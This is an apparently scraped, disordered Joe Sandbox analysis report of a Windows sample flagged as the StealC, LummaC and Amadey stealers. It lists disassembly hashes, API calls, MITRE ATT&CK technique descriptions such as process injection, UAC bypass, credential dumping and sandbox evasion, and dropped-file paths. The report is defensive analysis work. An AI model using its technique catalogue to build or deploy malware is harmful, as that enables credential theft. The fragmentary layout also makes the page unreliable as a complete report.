Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Value$calloc
String ID:
API String ID: 3339632435-0
Opcode ID: 4d212bcbbd916c576362602592b122eee6030a32267101be7921d0beb1fd979a
Instruction ID: 8114494f7a0e2b2aad0541000ca25bdca38fe776e89a3f42eba788d79b85d6a9
Opcode Fuzzy Hash: 4d212bcbbd916c576362602592b122eee6030a32267101be7921d0beb1fd979a
Instruction Fuzzy Hash: BE31D6B1744380CBDB145F3CCA8429977B4BF4A308F114A6DD899A7A21EF309486CB8A

Function 6C600F10 Relevance: 5.1, APIs: 4, Instructions: 52stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6C5A2AF5,?,?,?,?,?,6C5A0A1B,00000000), ref: 6C600F1A
malloc.MOZGLUE(00000001), ref: 6C600F30
memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C600F42
TlsGetValue.KERNEL32 ref: 6C600F5B

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Valuemallocmemcpystrlen
String ID:
API String ID: 2332725481-0
Opcode ID: 436e740223525c40e68736d77a6d6411b4855b9312598513f5f35fd8ac010e81
Instruction ID: 89935cb1c0a4af54ebd6683986c99ca14ca2dc28e72efe36c39780e55cb34215
Opcode Fuzzy Hash: 436e740223525c40e68736d77a6d6411b4855b9312598513f5f35fd8ac010e81
Instruction Fuzzy Hash: F90128B1B002809BE7102F3E9F445927BACEF82359F000575ED1CD2A21EB30C815C2EA

Function 6C5B1EB0 Relevance: 5.0, APIs: 4, Instructions: 38COMMON

Download Yara Rule

APIs

free.MOZGLUE(?), ref: 6C5B1ECE
free.MOZGLUE(?), ref: 6C5B1EDF
free.MOZGLUE(?), ref: 6C5B1EEF
free.MOZGLUE(?), ref: 6C5B1EF5

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: b8a6a1b38059e73c965c888b4eb471d49784269cfd09790e425c906a961825d6
Instruction ID: be69cb0a271495f84334b216be31132c85707df3c702a05afc9fcad7532439b0
Opcode Fuzzy Hash: b8a6a1b38059e73c965c888b4eb471d49784269cfd09790e425c906a961825d6
Instruction Fuzzy Hash: 32F0B4B17005016BEB10DB66EC89D277B6CEF45294B140434EC1AD3A00D736F420C6A5

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Process: OS API Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: LummaC

Threatname: Amadey

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\AAFIJKKEHJDHJKFIECAA

C:\ProgramData\AAFIJKKEHJDHJKFIECAAKFIJJK

C:\ProgramData\AEBAKJDGHIIJJKFHCFCA

C:\ProgramData\CBKJJJDH

C:\ProgramData\GIIDBGDAFHJDHIDGDGII

Windows Analysis Report
file.exe

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre